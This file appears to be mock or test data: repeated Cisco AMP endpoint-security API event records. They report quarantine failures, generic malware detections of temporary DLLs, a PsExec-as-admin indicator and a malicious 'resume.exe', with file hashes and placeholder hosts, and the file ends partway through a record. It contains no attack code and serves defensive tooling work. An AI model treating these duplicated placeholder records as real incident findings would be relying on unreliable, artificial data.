-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud 